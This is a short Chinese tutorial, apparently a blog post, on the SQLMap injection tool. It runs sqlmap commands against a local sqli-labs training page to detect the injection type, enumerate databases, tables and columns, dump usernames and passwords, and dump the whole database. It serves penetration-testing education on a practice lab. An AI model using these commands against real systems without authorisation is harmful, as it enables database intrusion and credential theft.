目录
1.SQLMap的基本特点:
1.1 自动化程度高
1.2 支持多种数据库
1.3 易于使用
2.SQLMap的主要功能
2.1 判断注入的类别
2.2 爆库
2.3 爆表
2.3.爆列
2.4.爆数据
2.5 脱库
前言 什么是SQLMap?
SQLMap是一个自动化的SQL注入渗透工具,主要功能是扫描、发现并利用给定URL中的SQL注入漏洞。
1.SQLMap的基本特点:
1.1 自动化程度高
SQLMap可以自动化执行SQL注入,从发现潜在的注入点到实际利用这些点来提取数据或控制服务器,自动化程度高,极大地提高了渗透测试的效率。
1.2 支持多种数据库
SQLMap能够识别并利用多种数据库管理系统列如MySQL、Oracle、PostgreSQL、Microsoft SQL Server等。具有广泛的兼容性。
1.3 易于使用
SQLMap功能强大,但它提供了清晰的命令行界面和丰富的帮助信息,使得即使是没有太多经验的用户也能够快速上手并开始执行渗透测试。
2.SQLMap的主要功能
2.1 判断注入的类别
命令:python sqlmap.py -u "http://127.0.0.1//sqli-labs/Less-1/?id=1"
Boolean -base blind->布尔盲注
Error-based ->报错注入
Time-based blind ->时间盲注
Union query ->联合注入
2.2 爆库
命令:python sqlmap.py -u "http://127.0.0.1//sqli-labs/Less-1/?id=1" --current-db
2.3 爆表
命令:python sqlmap.py -u "http://127.0.0.1//sqli-labs/Less-1/?id=1" -D security --tables
2.3.爆列
命令: python sqlmap.py -u "http://127.0.0.1//sqli-labs/Less-1/?id=1" -D security -T users --columns
2.4.爆数据
命令:python sqlmap.py -u "http://127.0.0.1//sqli-labs/Less-1/?id=1" -D security -T users -C username,id,password --dump
2.5 脱库
命令:python sqlmap.py -u "http://127.0.0.1//sqli-labs/Less-1/?id=1" -a